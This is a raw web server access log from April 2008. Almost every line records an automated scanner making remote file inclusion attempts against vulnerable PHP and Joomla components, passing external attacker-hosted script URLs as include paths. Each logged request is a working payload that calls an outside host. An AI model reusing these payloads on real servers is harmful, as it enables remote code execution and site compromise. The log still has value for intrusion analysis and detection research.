196.35.158.180 - - [30/Apr/2008:11:34:46 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
221.143.49.246 - - [30/Apr/2008:11:35:01 -0700] "GET /logs/access_071219.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [30/Apr/2008:11:35:02 -0700] "GET /errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [30/Apr/2008:11:35:02 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [30/Apr/2008:11:35:03 -0700] "GET /logs/access_071219.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [30/Apr/2008:11:35:03 -0700] "GET /errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [30/Apr/2008:11:35:03 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:11:35:22 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:11:35:22 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.188.211.28 - - [30/Apr/2008:11:35:25 -0700] "GET /logs/access_080223.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.188.211.28 - - [30/Apr/2008:11:35:26 -0700] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:35:36 -0700] "GET /logs/access_080220.log//components/com_minibb/bb_plugins.php?absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:35:43 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.188.211.28 - - [30/Apr/2008:11:35:48 -0700] "GET /logs/access_080324.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.3 - - [30/Apr/2008:11:36:39 -0700] "GET /logs/access_080321.log/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:36:40 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.3 - - [30/Apr/2008:11:36:40 -0700] "GET /logs/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:36:44 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:11:36:48 -0700] "GET /logs/access_080223.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.59.151.227 - - [30/Apr/2008:11:37:03 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.59.151.227 - - [30/Apr/2008:11:37:03 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.59.151.227 - - [30/Apr/2008:11:37:03 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.59.151.227 - - [30/Apr/2008:11:37:04 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.59.151.227 - - [30/Apr/2008:11:37:04 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.59.151.227 - - [30/Apr/2008:11:37:04 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.254.39.118 - - [30/Apr/2008:11:37:05 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.39.118 - - [30/Apr/2008:11:37:05 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.39.118 - - [30/Apr/2008:11:37:05 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.39.118 - - [30/Apr/2008:11:37:08 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.39.118 - - [30/Apr/2008:11:37:08 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.39.118 - - [30/Apr/2008:11:37:08 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:37:09 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.80 - - [30/Apr/2008:11:37:12 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.9.163 - - [30/Apr/2008:11:37:19 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [30/Apr/2008:11:37:20 -0700] "GET //ashnews.php?pathtoashnews=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [30/Apr/2008:11:37:21 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:11:37:59 -0700] "GET /logs/access_080225.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.72.189 - - [30/Apr/2008:11:38:02 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.72.189 - - [30/Apr/2008:11:38:03 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.72.189 - - [30/Apr/2008:11:38:03 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.72.189 - - [30/Apr/2008:11:38:03 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.72.189 - - [30/Apr/2008:11:38:04 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.72.189 - - [30/Apr/2008:11:38:04 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:38:18 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:38:18 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:11:38:24 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:11:38:28 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.0" 200 11590 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:38:34 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.35.158.180 - - [30/Apr/2008:11:39:32 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.42.133.2 - - [30/Apr/2008:11:39:52 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.59.151.227 - - [30/Apr/2008:11:40:04 -0700] "GET /logs/access_080130.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.59.151.227 - - [30/Apr/2008:11:40:05 -0700] "GET /logs/access_080130.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.162.6 - - [30/Apr/2008:11:40:05 -0700] "GET /logs/errors.php?error=http://thetestingcompany.com//images/stories/a2id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.253.162.6 - - [30/Apr/2008:11:40:06 -0700] "GET /errors.php?error=http://thetestingcompany.com//images/stories/a2id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.123.108.73 - - [30/Apr/2008:11:40:36 -0700] "GET /logs//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [30/Apr/2008:11:40:36 -0700] "GET //atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.175.239.19 - - [30/Apr/2008:11:40:40 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
87.175.239.19 - - [30/Apr/2008:11:40:40 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
65.254.39.118 - - [30/Apr/2008:11:40:44 -0700] "GET /logs/access_080130.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.39.118 - - [30/Apr/2008:11:40:44 -0700] "GET /logs/access_080130.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.72.189 - - [30/Apr/2008:11:40:47 -0700] "GET /logs/access_080130.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.72.189 - - [30/Apr/2008:11:40:47 -0700] "GET /logs/access_080130.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.181 - - [30/Apr/2008:11:40:59 -0700] "GET //ashnews.php?pathtoashnews=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.36.175.10 - - [30/Apr/2008:11:41:01 -0700] "GET /logs/access_080218.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.42.133.2 - - [30/Apr/2008:11:41:20 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.15.107.13 - - [30/Apr/2008:11:41:40 -0700] "GET /logs//details.html//atom.php5?page=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.15.107.13 - - [30/Apr/2008:11:41:41 -0700] "GET //details.html//atom.php5?page=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.80 - - [30/Apr/2008:11:41:46 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [30/Apr/2008:11:41:47 -0700] "GET /lostpasswd.php?env[include_prefix]=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [30/Apr/2008:11:41:47 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [30/Apr/2008:11:41:51 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [30/Apr/2008:11:41:57 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.130.26 - - [30/Apr/2008:11:42:04 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.130.26 - - [30/Apr/2008:11:42:05 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.130.26 - - [30/Apr/2008:11:42:05 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.130.26 - - [30/Apr/2008:11:42:05 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.130.26 - - [30/Apr/2008:11:42:05 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.130.26 - - [30/Apr/2008:11:42:06 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.188.211.28 - - [30/Apr/2008:11:42:16 -0700] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.188.211.28 - - [30/Apr/2008:11:42:16 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:42:28 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:42:29 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.56.80 - - [30/Apr/2008:11:43:31 -0700] "GET /lostpasswd.php?env[include_prefix]=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [30/Apr/2008:11:43:37 -0700] "GET /logs/access_080308.log/lostpasswd.php?env[include_prefix]=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.42.133.2 - - [30/Apr/2008:11:43:42 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.60.46.110 - - [30/Apr/2008:11:43:50 -0700] "GET /logs/access.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5" "www.dmulk.com"
77.221.130.3 - - [30/Apr/2008:11:44:25 -0700] "GET /logs/access_080116.log/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:11:44:49 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:11:44:49 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:11:44:49 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [30/Apr/2008:11:44:55 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:11:45:04 -0700] "GET /logs//ashnews.php?pathtoashnews=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:11:45:05 -0700] "GET //ashnews.php?pathtoashnews=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:11:45:06 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.115 - - [30/Apr/2008:11:45:28 -0700] "GET /minamijewelry/kanji1.psd HTTP/1.0" 200 515148 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.94.130.26 - - [30/Apr/2008:11:45:29 -0700] "GET /logs/access_080130.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.130.26 - - [30/Apr/2008:11:45:33 -0700] "GET /logs/access_080130.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.133.2 - - [30/Apr/2008:11:45:47 -0700] "GET /logs/access_080302.log//admin/business_inc/saveserver.php?thisdir=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:45:53 -0700] "GET /logs//components/com_minibb/bb_plugins.php?absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:45:53 -0700] "GET //components/com_minibb/bb_plugins.php?absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:46:13 -0700] "GET /logs/access_080212.log/avatar.php?page=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:46:15 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:46:17 -0700] "GET /avatar.php?page=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:46:19 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:46:20 -0700] "GET /logs/avatar.php?page=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:11:46:37 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:11:46:42 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.0" 200 11590 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:11:47:39 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:11:47:40 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:11:47:44 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.154.38.121 - - [30/Apr/2008:11:47:48 -0700] "GET /logs/access_080220.log//newspublish/include.php?path%5Bdocroot%5D=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:47:48 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:47:49 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:47:59 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:47:59 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:11:48:13 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:48:23 -0700] "GET /logs/access_080218.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:48:25 -0700] "GET /logs/access_080218.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
